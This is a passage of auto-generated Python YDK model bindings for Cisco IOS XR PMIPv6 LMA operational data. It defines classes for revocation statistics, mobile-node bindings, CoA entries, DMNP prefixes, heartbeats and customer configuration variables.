Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class Bindings(Entity):
"""
Table of Binding
.. attribute:: binding
Binding Parameters
**type**\: list of :py:class:`Binding <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings, self).__init__()
self.yang_name = "bindings"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("binding", ("binding", Pmipv6.Lma.Bindings.Binding))])
self._leafs = OrderedDict()
self.binding = YList(self)
self._segment_path = lambda: "bindings"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings, [], name, value)
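# --- Illustrative usage (not part of the generated model) -------------------
# The bindings table holds one entry per mobile-node binding. A minimal
# sketch, assuming a `pmipv6` object already read as in the earlier example,
# of listing binding state using the leafs declared in the Binding class
# below:
#
#     for binding in pmipv6.lma.bindings.binding:
#         print(binding.mnnai, binding.state, binding.hoa,
#               binding.lifetime, binding.liferem)
# -----------------------------------------------------------------------------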
class Binding(Entity):
"""
Binding Parameters
.. attribute:: mag_name
Peer MAG ID
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: nai_string
NAI String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: imsi_string
IMSI String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: customer_name
Customer String
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: mnnai
Mobile Node Identifier
**type**\: str
.. attribute:: customer_name_xr
Customer name
**type**\: str
.. attribute:: llid
Link Layer Identifier
**type**\: str
.. attribute:: peer_id
Peer Identifier
**type**\: str
.. attribute:: phyintf
Access Interface
**type**\: str
.. attribute:: tunnel
Tunnel Interface
**type**\: str
.. attribute:: state
State Name
**type**\: str
.. attribute:: apn
Access Point Name
**type**\: str
.. attribute:: att
MN ATT
**type**\: int
**range:** 0..65535
.. attribute:: hoa
MN HOA
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dflt
MN Default Router
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: lifetime
Life Time of Binding
**type**\: int
**range:** 0..4294967295
.. attribute:: liferem
Life Time Remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh
Refresh Time of Binding
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh_rem
Refresh Time Remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: prefix_len
Prefix Length
**type**\: int
**range:** 0..255
.. attribute:: num_hnps
HNP count
**type**\: int
**range:** 0..255
.. attribute:: num_coa
COA count
**type**\: int
**range:** 0..255
.. attribute:: num_dmnp_v4
IPv4 DMNP count
**type**\: int
**range:** 0..255
.. attribute:: num_dmnp_v6
IPv6 DMNP count
**type**\: int
**range:** 0..255
.. attribute:: hnps
MN Home Network Prefixes
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: ignore_home_address
Ignore HoA/HNP
**type**\: bool
.. attribute:: up_stream_grekey
Upstream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: down_stream_grekey
DownStream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: vrfid
VRF ID of Access Interface
**type**\: int
**range:** 0..4294967295
.. attribute:: coa
COA entries
**type**\: list of :py:class:`Coa <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.Coa>`
.. attribute:: dmnp_v4
IPv4 DMNP prefixes
**type**\: list of :py:class:`DmnpV4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.DmnpV4>`
.. attribute:: dmnp_v6
IPv6 DMNP prefixes
**type**\: list of :py:class:`DmnpV6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings.Binding.DmnpV6>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding, self).__init__()
self.yang_name = "binding"
self.yang_parent_name = "bindings"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("coa", ("coa", Pmipv6.Lma.Bindings.Binding.Coa)), ("dmnp-v4", ("dmnp_v4", Pmipv6.Lma.Bindings.Binding.DmnpV4)), ("dmnp-v6", ("dmnp_v6", Pmipv6.Lma.Bindings.Binding.DmnpV6))])
self._leafs = OrderedDict([
('mag_name', (YLeaf(YType.str, 'mag-name'), ['str'])),
('nai_string', (YLeaf(YType.str, 'nai-string'), ['str'])),
('imsi_string', (YLeaf(YType.str, 'imsi-string'), ['str'])),
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('mnnai', (YLeaf(YType.str, 'mnnai'), ['str'])),
('customer_name_xr', (YLeaf(YType.str, 'customer-name-xr'), ['str'])),
('llid', (YLeaf(YType.str, 'llid'), ['str'])),
('peer_id', (YLeaf(YType.str, 'peer-id'), ['str'])),
('phyintf', (YLeaf(YType.str, 'phyintf'), ['str'])),
('tunnel', (YLeaf(YType.str, 'tunnel'), ['str'])),
('state', (YLeaf(YType.str, 'state'), ['str'])),
('apn', (YLeaf(YType.str, 'apn'), ['str'])),
('att', (YLeaf(YType.uint16, 'att'), ['int'])),
('hoa', (YLeaf(YType.str, 'hoa'), ['str'])),
('dflt', (YLeaf(YType.str, 'dflt'), ['str'])),
('lifetime', (YLeaf(YType.uint32, 'lifetime'), ['int'])),
('liferem', (YLeaf(YType.uint32, 'liferem'), ['int'])),
('refresh', (YLeaf(YType.uint32, 'refresh'), ['int'])),
('refresh_rem', (YLeaf(YType.uint32, 'refresh-rem'), ['int'])),
('prefix_len', (YLeaf(YType.uint8, 'prefix-len'), ['int'])),
('num_hnps', (YLeaf(YType.uint8, 'num-hnps'), ['int'])),
('num_coa', (YLeaf(YType.uint8, 'num-coa'), ['int'])),
('num_dmnp_v4', (YLeaf(YType.uint8, 'num-dmnp-v4'), ['int'])),
('num_dmnp_v6', (YLeaf(YType.uint8, 'num-dmnp-v6'), ['int'])),
('hnps', (YLeaf(YType.str, 'hnps'), ['str'])),
('ignore_home_address', (YLeaf(YType.boolean, 'ignore-home-address'), ['bool'])),
('up_stream_grekey', (YLeaf(YType.uint32, 'up-stream-grekey'), ['int'])),
('down_stream_grekey', (YLeaf(YType.uint32, 'down-stream-grekey'), ['int'])),
('vrfid', (YLeaf(YType.uint32, 'vrfid'), ['int'])),
])
self.mag_name = None
self.nai_string = None
self.imsi_string = None
self.customer_name = None
self.mnnai = None
self.customer_name_xr = None
self.llid = None
self.peer_id = None
self.phyintf = None
self.tunnel = None
self.state = None
self.apn = None
self.att = None
self.hoa = None
self.dflt = None
self.lifetime = None
self.liferem = None
self.refresh = None
self.refresh_rem = None
self.prefix_len = None
self.num_hnps = None
self.num_coa = None
self.num_dmnp_v4 = None
self.num_dmnp_v6 = None
self.hnps = None
self.ignore_home_address = None
self.up_stream_grekey = None
self.down_stream_grekey = None
self.vrfid = None
self.coa = YList(self)
self.dmnp_v4 = YList(self)
self.dmnp_v6 = YList(self)
self._segment_path = lambda: "binding"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding, ['mag_name', 'nai_string', 'imsi_string', 'customer_name', 'mnnai', 'customer_name_xr', 'llid', 'peer_id', 'phyintf', 'tunnel', 'state', 'apn', 'att', 'hoa', 'dflt', 'lifetime', 'liferem', 'refresh', 'refresh_rem', 'prefix_len', 'num_hnps', 'num_coa', 'num_dmnp_v4', 'num_dmnp_v6', 'hnps', 'ignore_home_address', 'up_stream_grekey', 'down_stream_grekey', 'vrfid'], name, value)
class Coa(Entity):
"""
COA entries
.. attribute:: llid
Link Layer Identifier
**type**\: str
.. attribute:: peer_name
Peer Name
**type**\: str
.. attribute:: tunnel
Tunnel Interface
**type**\: str
.. attribute:: e_label
Egress Label
**type**\: str
.. attribute:: color
Label Color
**type**\: str
.. attribute:: roa_min_tf
Roaming Intf
**type**\: str
.. attribute:: pstate
COA STATE
**type**\: str
.. attribute:: msisdn
MSISDN
**type**\: str
.. attribute:: imsi
IMSI or IMSI NAI
**type**\: str
.. attribute:: cdma_nai
CDMA NAI
**type**\: str
.. attribute:: pgw_apn
Subscriber APN on PGW
**type**\: str
.. attribute:: pgw_trans_vrf
Subscriber Transport VRF on PGW
**type**\: str
.. attribute:: att
MN ATT
**type**\: int
**range:** 0..65535
.. attribute:: lifetime
Life Time of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: lifetime_remaining
Life Time remaining of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh
refresh Time of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: refresh_rem
refresh Time remaining of coa
**type**\: int
**range:** 0..4294967295
.. attribute:: dnkey
down key for coa tunnel
**type**\: int
**range:** 0..4294967295
.. attribute:: upkey
up key for coa tunnel
**type**\: int
**range:** 0..4294967295
.. attribute:: coa_v4
IPv4 CoA
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: coa_v6
IPv6 CoA
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.Coa, self).__init__()
self.yang_name = "coa"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('llid', (YLeaf(YType.str, 'llid'), ['str'])),
('peer_name', (YLeaf(YType.str, 'peer-name'), ['str'])),
('tunnel', (YLeaf(YType.str, 'tunnel'), ['str'])),
('e_label', (YLeaf(YType.str, 'e-label'), ['str'])),
('color', (YLeaf(YType.str, 'color'), ['str'])),
('roa_min_tf', (YLeaf(YType.str, 'roa-min-tf'), ['str'])),
('pstate', (YLeaf(YType.str, 'pstate'), ['str'])),
('msisdn', (YLeaf(YType.str, 'msisdn'), ['str'])),
('imsi', (YLeaf(YType.str, 'imsi'), ['str'])),
('cdma_nai', (YLeaf(YType.str, 'cdma-nai'), ['str'])),
('pgw_apn', (YLeaf(YType.str, 'pgw-apn'), ['str'])),
('pgw_trans_vrf', (YLeaf(YType.str, 'pgw-trans-vrf'), ['str'])),
('att', (YLeaf(YType.uint16, 'att'), ['int'])),
('lifetime', (YLeaf(YType.uint32, 'lifetime'), ['int'])),
('lifetime_remaining', (YLeaf(YType.uint32, 'lifetime-remaining'), ['int'])),
('refresh', (YLeaf(YType.uint32, 'refresh'), ['int'])),
('refresh_rem', (YLeaf(YType.uint32, 'refresh-rem'), ['int'])),
('dnkey', (YLeaf(YType.uint32, 'dnkey'), ['int'])),
('upkey', (YLeaf(YType.uint32, 'upkey'), ['int'])),
('coa_v4', (YLeaf(YType.str, 'coa-v4'), ['str'])),
('coa_v6', (YLeaf(YType.str, 'coa-v6'), ['str'])),
])
self.llid = None
self.peer_name = None
self.tunnel = None
self.e_label = None
self.color = None
self.roa_min_tf = None
self.pstate = None
self.msisdn = None
self.imsi = None
self.cdma_nai = None
self.pgw_apn = None
self.pgw_trans_vrf = None
self.att = None
self.lifetime = None
self.lifetime_remaining = None
self.refresh = None
self.refresh_rem = None
self.dnkey = None
self.upkey = None
self.coa_v4 = None
self.coa_v6 = None
self._segment_path = lambda: "coa"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.Coa, ['llid', 'peer_name', 'tunnel', 'e_label', 'color', 'roa_min_tf', 'pstate', 'msisdn', 'imsi', 'cdma_nai', 'pgw_apn', 'pgw_trans_vrf', 'att', 'lifetime', 'lifetime_remaining', 'refresh', 'refresh_rem', 'dnkey', 'upkey', 'coa_v4', 'coa_v6'], name, value)
class DmnpV4(Entity):
"""
IPv4 DMNP prefixes
.. attribute:: pfxlen
IPv4 prefix length
**type**\: int
**range:** 0..255
.. attribute:: prefix
IPv4 prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.DmnpV4, self).__init__()
self.yang_name = "dmnp-v4"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pfxlen', (YLeaf(YType.uint8, 'pfxlen'), ['int'])),
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
])
self.pfxlen = None
self.prefix = None
self._segment_path = lambda: "dmnp-v4"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.DmnpV4, ['pfxlen', 'prefix'], name, value)
class DmnpV6(Entity):
"""
IPv6 DMNP prefixes
.. attribute:: pfxlen
IPv6 prefix length
**type**\: int
**range:** 0..255
.. attribute:: prefix
IPv6 prefix
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Bindings.Binding.DmnpV6, self).__init__()
self.yang_name = "dmnp-v6"
self.yang_parent_name = "binding"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pfxlen', (YLeaf(YType.uint8, 'pfxlen'), ['int'])),
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
])
self.pfxlen = None
self.prefix = None
self._segment_path = lambda: "dmnp-v6"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/bindings/binding/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Bindings.Binding.DmnpV6, ['pfxlen', 'prefix'], name, value)
class Heartbeats(Entity):
"""
Table of Heartbeat
.. attribute:: heartbeat
Heartbeat information
**type**\: list of :py:class:`Heartbeat <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Heartbeats.Heartbeat>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Heartbeats, self).__init__()
self.yang_name = "heartbeats"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("heartbeat", ("heartbeat", Pmipv6.Lma.Heartbeats.Heartbeat))])
self._leafs = OrderedDict()
self.heartbeat = YList(self)
self._segment_path = lambda: "heartbeats"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Heartbeats, [], name, value)
class Heartbeat(Entity):
"""
Heartbeat information
.. attribute:: peer_addr (key)
IPv4 or IPv6 address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: vrf
VRF Name
**type**\: str
.. attribute:: customer_name
Customer Name
**type**\: str
.. attribute:: source_port
Source Port
**type**\: int
**range:** 0..4294967295
.. attribute:: destination_port
Destination Port
**type**\: int
**range:** 0..4294967295
.. attribute:: source_ipv4_address
Source IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: destination_ipv4_address
Destination IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: source_ipv6_address
Source IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: destination_ipv6_address
Destination IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: status
Path Status
**type**\: bool
.. attribute:: ipv6_path
IPv6 Path
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Heartbeats.Heartbeat, self).__init__()
self.yang_name = "heartbeat"
self.yang_parent_name = "heartbeats"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['peer_addr']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer_addr', (YLeaf(YType.str, 'peer-addr'), ['str','str'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('source_port', (YLeaf(YType.uint32, 'source-port'), ['int'])),
('destination_port', (YLeaf(YType.uint32, 'destination-port'), ['int'])),
('source_ipv4_address', (YLeaf(YType.str, 'source-ipv4-address'), ['str'])),
('destination_ipv4_address', (YLeaf(YType.str, 'destination-ipv4-address'), ['str'])),
('source_ipv6_address', (YLeaf(YType.str, 'source-ipv6-address'), ['str'])),
('destination_ipv6_address', (YLeaf(YType.str, 'destination-ipv6-address'), ['str'])),
('status', (YLeaf(YType.boolean, 'status'), ['bool'])),
('ipv6_path', (YLeaf(YType.boolean, 'ipv6-path'), ['bool'])),
])
self.peer_addr = None
self.vrf = None
self.customer_name = None
self.source_port = None
self.destination_port = None
self.source_ipv4_address = None
self.destination_ipv4_address = None
self.source_ipv6_address = None
self.destination_ipv6_address = None
self.status = None
self.ipv6_path = None
self._segment_path = lambda: "heartbeat" + "[peer-addr='" + str(self.peer_addr) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/heartbeats/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Heartbeats.Heartbeat, ['peer_addr', 'vrf', 'customer_name', 'source_port', 'destination_port', 'source_ipv4_address', 'destination_ipv4_address', 'source_ipv6_address', 'destination_ipv6_address', 'status', 'ipv6_path'], name, value)
class ConfigVariables(Entity):
"""
Global Configuration Variables
.. attribute:: customer_variables
Table of CustomerVariables
**type**\: :py:class:`CustomerVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables>`
.. attribute:: global_variables
Global Configuration Variables
**type**\: :py:class:`GlobalVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables, self).__init__()
self.yang_name = "config-variables"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-variables", ("customer_variables", Pmipv6.Lma.ConfigVariables.CustomerVariables)), ("global-variables", ("global_variables", Pmipv6.Lma.ConfigVariables.GlobalVariables))])
self._leafs = OrderedDict()
self.customer_variables = Pmipv6.Lma.ConfigVariables.CustomerVariables()
self.customer_variables.parent = self
self._children_name_map["customer_variables"] = "customer-variables"
self.global_variables = Pmipv6.Lma.ConfigVariables.GlobalVariables()
self.global_variables.parent = self
self._children_name_map["global_variables"] = "global-variables"
self._segment_path = lambda: "config-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables, [], name, value)
class CustomerVariables(Entity):
"""
Table of CustomerVariables
.. attribute:: customer_variable
Customer name string
**type**\: list of :py:class:`CustomerVariable <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables, self).__init__()
self.yang_name = "customer-variables"
self.yang_parent_name = "config-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-variable", ("customer_variable", Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable))])
self._leafs = OrderedDict()
self.customer_variable = YList(self)
self._segment_path = lambda: "customer-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables, [], name, value)
class CustomerVariable(Entity):
"""
Customer name string
.. attribute:: customer_name (key)
Customer name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: mll_service
MLL service parameters
**type**\: :py:class:`MllService <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService>`
.. attribute:: cust_name
Customer Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: auth_option
Authentication Option
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable, self).__init__()
self.yang_name = "customer-variable"
self.yang_parent_name = "customer-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['customer_name']
self._child_classes = OrderedDict([("mll-service", ("mll_service", Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService))])
self._leafs = OrderedDict([
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('cust_name', (YLeaf(YType.str, 'cust-name'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
])
self.customer_name = None
self.cust_name = None
self.vrf_name = None
self.auth_option = None
self.mll_service = Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService()
self.mll_service.parent = self
self._children_name_map["mll_service"] = "mll-service"
self._segment_path = lambda: "customer-variable" + "[customer-name='" + str(self.customer_name) + "']"
